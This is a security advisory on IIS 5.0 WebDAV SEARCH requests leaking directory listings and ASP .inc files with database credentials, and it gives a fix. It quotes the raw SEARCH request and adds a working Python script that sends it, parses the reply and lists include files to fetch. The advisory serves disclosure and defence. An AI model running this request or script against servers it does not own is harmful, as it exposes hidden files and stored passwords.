COMMAND
IIS
SYSTEMS AFFECTED
IIS 5.0
PROBLEM
Following is based on an @stake Advisory by mnemonix. Microsoft's
Internet Information Services (IIS) 5.0 is WebDAV (RFC 2518) enabled. As
part of the extra functionality provided by the WebDAV components,
Microsoft has introduced the SEARCH request method to enable
searching for files based upon certain criteria. This
functionality can be abused to obtain the equivalent of a
directory listing. Such listings let an attacker locate files in
the web directories that are not normally exposed through links on
the web site: .inc files and other components of ASP applications
that potentially contain sensitive information can be found this
way and then requested directly.
For a SEARCH request to succeed, the Index Service must be running
and Read access must be granted on the directory being searched. By
default all directories are indexed; however, the Index Service is
not started by default.
Those at risk from this particular issue are therefore sites
running IIS 5.0 with the Index Service running.
By making a request similar to the following (a blank line separates
the headers from the XML body; the Content-Length of 133 is the
length of that body with CRLF line endings and no trailing newline):
SEARCH / HTTP/1.1
Host: 127.0.0.1
Content-Type: text/xml
Content-Length: 133

<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
it is possible to obtain a listing of the root directory and every
sub-directory beneath it. Attackers may thereby discover "hidden"
files or enumerate the .inc files used by ASP applications and then
download them directly. Because IIS does not script-map .inc by
default, such files are returned verbatim, and they frequently
contain sensitive information such as database login names and
passwords.
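The request above, as an added example that is not part of the @stake advisory or Microsoft's code: a small Python script that builds the SEARCH request with a computed Content-Length, parses the 207 Multi-Status reply for DAV:displayname values, and filters out the include files an attacker would fetch next. The 207 reply embedded below is constructed for the example (element layout from RFC 2518; hosts, paths and file names are made up); the search() function is the live version, which can also be re-run after applying the solution in the next section, where anything other than a 207 response shows that SEARCH no longer yields a listing.

```python
"""Issue the WebDAV SEARCH from the advisory and parse the reply for file
names.  Added example; the sample 207 reply is constructed, not captured."""
import http.client
import xml.etree.ElementTree as ET

DAV = "{DAV:}"  # Clark notation for the DAV: namespace used by ElementTree

# The XML body exactly as given in the advisory, with CRLF line endings.
SEARCH_BODY = (
    '<?xml version="1.0"?>\r\n'
    '<g:searchrequest xmlns:g="DAV:">\r\n'
    '<g:sql>\r\n'
    'Select "DAV:displayname" from scope()\r\n'
    '</g:sql>\r\n'
    '</g:searchrequest>'
)


def build_search_request(host, path="/", body=SEARCH_BODY):
    """Return the raw request bytes.  Content-Length is computed from the
    encoded body so it cannot drift from the XML when the body is edited."""
    payload = body.encode("ascii")
    head = (
        f"SEARCH {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: text/xml\r\n"
        f"Content-Length: {len(payload)}\r\n"
        "\r\n"
    )
    return head.encode("ascii") + payload


def parse_multistatus(xml_text):
    """Return (href, displayname) for every DAV:response whose propstat
    carries a 200 status; entries with other statuses have no usable name."""
    root = ET.fromstring(xml_text)
    found = []
    for resp in root.iter(DAV + "response"):
        href = resp.findtext(DAV + "href", default="")
        for propstat in resp.iter(DAV + "propstat"):
            status = propstat.findtext(DAV + "status", default="")
            if " 200 " not in status:
                continue
            name = propstat.findtext(DAV + "prop/" + DAV + "displayname")
            if name is not None:
                found.append((href, name))
    return found


def sensitive_files(entries, suffixes=(".inc",)):
    """Keep entries whose name ends with an include-file suffix."""
    return [e for e in entries if e[1].lower().endswith(tuple(suffixes))]


def search(host, path="/", port=80):
    """Live version: send the SEARCH and parse the reply.  Returns None when
    the server does not answer 207 (Index Service stopped, SEARCH refused,
    or no Read permission on the directory)."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("SEARCH", path, body=SEARCH_BODY,
                 headers={"Content-Type": "text/xml"})
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    if resp.status != 207:
        return None
    return parse_multistatus(data.decode("utf-8", "replace"))


# Constructed sample 207 Multi-Status reply (assumed shape, invented values).
SAMPLE_REPLY = """<?xml version="1.0"?>
<a:multistatus xmlns:a="DAV:">
<a:response><a:href>http://127.0.0.1/</a:href>
<a:propstat><a:status>HTTP/1.1 200 OK</a:status>
<a:prop><a:displayname>/</a:displayname></a:prop></a:propstat></a:response>
<a:response><a:href>http://127.0.0.1/default.asp</a:href>
<a:propstat><a:status>HTTP/1.1 200 OK</a:status>
<a:prop><a:displayname>default.asp</a:displayname></a:prop></a:propstat></a:response>
<a:response><a:href>http://127.0.0.1/include/db.inc</a:href>
<a:propstat><a:status>HTTP/1.1 200 OK</a:status>
<a:prop><a:displayname>db.inc</a:displayname></a:prop></a:propstat></a:response>
<a:response><a:href>http://127.0.0.1/private/</a:href>
<a:propstat><a:status>HTTP/1.1 404 Not Found</a:status>
<a:prop><a:displayname/></a:prop></a:propstat></a:response>
</a:multistatus>"""

if __name__ == "__main__":
    print(build_search_request("127.0.0.1").decode("ascii"))
    for href, name in sensitive_files(parse_multistatus(SAMPLE_REPLY)):
        print("include file exposed:", href, name)
```

build_search_request() reproduces the advisory's request byte for byte, including Content-Length: 133, which confirms that figure was computed with CRLF line endings. A reply with a 4xx status for an entry is skipped rather than reported, since a 404 or 403 propstat carries no displayname worth following up.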
SOLUTION
If you do not use the Index Service, disable it; this prevents the
issue entirely. If you do use it, place any files that may be
considered sensitive in a directory that is not indexed or that has
had the Read permission removed.
Microsoft has published a KB article on this issue:
http://www.microsoft.com/technet/support/kb.asp?ID=272079